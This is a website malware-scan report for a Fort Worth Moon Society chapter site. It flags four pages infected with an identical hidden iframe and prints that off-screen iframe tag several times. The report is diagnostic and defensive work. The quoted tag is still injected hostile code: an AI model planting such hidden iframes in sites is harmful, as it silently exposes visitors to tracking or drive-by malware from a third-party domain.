New scan:

Malware Scanner report for ftworthmoon.org

Malicious/Suspicious/Total urls checked
4/0/15
4 pages have malicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "ftworthmoon.org" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
4/0/4
4 malicious iframes found. See details below
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=ftworthmoon.org

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://ftworthmoon.org/
200 OK
Content-Length: 47893
Content-Type: text/html
malicious
Page code contains blacklisted domain: adv-inc-net.com

<!DOCTYPE html>
<!--[if IE 7]>
<html id="ie7" lang="en-US">
<![endif]-->
<!--[if (gt IE 7) | (!IE)]><!-->
<html lang="en-US">
<!--<![endif]-->
<head>
<meta charset="UTF-8" />
<title>The Greater Ft Worth Moon Society | local chapter of the Moon Society</title>
<link rel="profile" href="http://gmpg.org/xfn/11" />
<link rel="ping
...[4001 bytes skipped]...

Malicious iFrame found. The same iFrame was found in 34 websites.
size: 640x480     
src: http://adv-inc-net.com/trackingcode/tracker.html
This URL is marked by Google as suspicious

<iframe src="http://adv-inc-net.com/trackingcode/tracker.html" width=640 height=480 style='position: absolute; left: -1000px; top: -1000px; z-index: 1;'>

http://ftworthmoon.org/wp-includes/js/jquery/jquery.js?ver=1.10.2
200 OK
Content-Length: 93085
Content-Type: application/javascript
clean
http://ftworthmoon.org/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1
200 OK
Content-Length: 7200
Content-Type: application/javascript
clean
http://ftworthmoon.org/wp-content/plugins/event-organiser/js/qtip2.js?ver=2.7.3
200 OK
Content-Length: 25268
Content-Type: application/javascript
clean
http://ftworthmoon.org/wp-includes/js/jquery/ui/jquery.ui.core.min.js?ver=1.10.3
200 OK
Content-Length: 4289
Content-Type: application/javascript
clean
http://ftworthmoon.org/wp-includes/js/jquery/ui/jquery.ui.widget.min.js?ver=1.10.3
200 OK
Content-Length: 6488
Content-Type: application/javascript
clean
http://ftworthmoon.org/wp-includes/js/jquery/ui/jquery.ui.button.min.js?ver=1.10.3
200 OK
Content-Length: 7143
Content-Type: application/javascript
clean
http://ftworthmoon.org/wp-includes/js/jquery/ui/jquery.ui.datepicker.min.js?ver=1.10.3
200 OK
Content-Length: 35806
Content-Type: application/javascript
clean
http://ftworthmoon.org/wp-content/plugins/event-organiser/js/fullcalendar.min.js?ver=2.7.3
200 OK
Content-Length: 49563
Content-Type: application/javascript
clean
http://ftworthmoon.org/wp-content/plugins/event-organiser/js/event-manager.min.js?ver=2.7.3
200 OK
Content-Length: 1525
Content-Type: application/javascript
clean
http://ftworthmoon.org/wp-content/plugins/event-organiser/js/frontend.min.js?ver=2.7.3
200 OK
Content-Length: 11497
Content-Type: application/javascript
clean
http://ftworthmoon.org/about/
200 OK
Content-Length: 26033
Content-Type: text/html
malicious
Page code contains blacklisted domain: adv-inc-net.com

<!DOCTYPE html>
<!--[if IE 7]>
<html id="ie7" lang="en-US">
<![endif]-->
<!--[if (gt IE 7) | (!IE)]><!-->
<html lang="en-US">
<!--<![endif]-->
<head>
<meta charset="UTF-8" />
<title>About | The Greater Ft Worth Moon Society</title>
<link rel="profile" href="http://gmpg.org/xfn/11" />
<link rel="pingback" href="http://ftworthmo
...[4005 bytes skipped]...

Malicious iFrame found. The same iFrame was found in 34 websites.
size: 640x480     
src: http://adv-inc-net.com/trackingcode/tracker.html
This URL is marked by Google as suspicious

<iframe src="http://adv-inc-net.com/trackingcode/tracker.html" width=640 height=480 style='position: absolute; left: -1000px; top: -1000px; z-index: 1;'>

http://ftworthmoon.org/wp-includes/js/comment-reply.min.js?ver=3.8.5
200 OK
Content-Length: 757
Content-Type: application/javascript
clean
http://ftworthmoon.org/events/
200 OK
Content-Length: 24595
Content-Type: text/html
malicious
Page code contains blacklisted domain: adv-inc-net.com

<!DOCTYPE html>
<!--[if IE 7]>
<html id="ie7" lang="en-US">
<![endif]-->
<!--[if (gt IE 7) | (!IE)]><!-->
<html lang="en-US">
<!--<![endif]-->
<head>
<meta charset="UTF-8" />
<title>Events | The Greater Ft Worth Moon Society</title>
<link rel="profile" href="http://gmpg.org/xfn/11" />
<link rel="pingback" href="http://ftworthm
...[4005 bytes skipped]...

Malicious iFrame found. The same iFrame was found in 34 websites.
size: 640x480     
src: http://adv-inc-net.com/trackingcode/tracker.html
This URL is marked by Google as suspicious

<iframe src="http://adv-inc-net.com/trackingcode/tracker.html" width=640 height=480 style='position: absolute; left: -1000px; top: -1000px; z-index: 1;'>

http://ftworthmoon.org/join-us/
200 OK
Content-Length: 27142
Content-Type: text/html
malicious
Page code contains blacklisted domain: adv-inc-net.com

<!DOCTYPE html>
<!--[if IE 7]>
<html id="ie7" lang="en-US">
<![endif]-->
<!--[if (gt IE 7) | (!IE)]><!-->
<html lang="en-US">
<!--<![endif]-->
<head>
<meta charset="UTF-8" />
<title>Join us! | The Greater Ft Worth Moon Society</title>
<link rel="profile" href="http://gmpg.org/xfn/11" />
<link rel="pingback" href="http://ftwort
...[4005 bytes skipped]...

Malicious iFrame found. The same iFrame was found in 34 websites.
size: 640x480     
src: http://adv-inc-net.com/trackingcode/tracker.html
This URL is marked by Google as suspicious

<iframe src="http://adv-inc-net.com/trackingcode/tracker.html" width=640 height=480 style='position: absolute; left: -1000px; top: -1000px; z-index: 1;'>


Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: ftworthmoon.org

Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 18 Jan 2015 15:47:50 GMT
Server: LiteSpeed
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
X-Pingback: http://ftworthmoon.org/xmlrpc.php
Second query (visit from search engine):
GET / HTTP/1.1
Host: ftworthmoon.org
Referer: http://www.google.com/search?q=ftworthmoon.org

Result:
The result is similar to the first query. There are no suspicious redirects found.